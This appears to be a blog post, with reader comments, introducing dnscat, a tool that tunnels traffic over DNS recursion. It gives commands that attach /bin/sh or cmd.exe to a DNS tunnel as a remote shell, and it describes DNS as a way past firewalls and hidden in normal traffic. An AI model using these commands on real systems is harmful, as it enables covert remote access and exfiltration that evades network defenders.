Hi folks,
Communicating by DNS is great because the client only needs the ability to talk to a single DNS server, any DNS server on the Internet (with recursion enabled). dnscat will, by default, use the system DNS server, which should cover basically every case. Firewalls aren’t going to stop you from talking to your local DNS server, right? And I don’t know about the average network, but on ours there are thousands of DNS queries every minute, so a little bit of extra traffic just gets lost in the flow.
In brief, dnscat works by taking advantage of DNS recursion. It sends messages to the authoritative nameserver for a domain, which is the key — to be a server, you have to be the authoritative nameserver for a domain. For example, I’m the authoritative server for skullseclabs.org, so any requests that end with .skullseclabs.org, no matter where they originate, will eventually connect to 208.81.2.52 (my current address).
Example: Remote shell.
Typically, to tunnel a shell over DNS, you’re going to want to run a standard server as before:
dnscat –domain skullseclabs.org –exec “/bin/sh”
Windows:
dnscat.exe –domain skullseclabs.org –exec “cmd.exe”
😀 Cool !
I am looking forward to see it. Having a MS plugin means having a lot of different payloads already written and tested. Thanks for your contribute !
BTW, if you need help feel free to contact me.
You're welcome. Thanks for your kind words!
I am actually working on some generic shellcode right now. This isn't my specialty, but I'm really having fun with it. Doing it for Metasploit is definitely something I'm hoping to do in the future.
Ron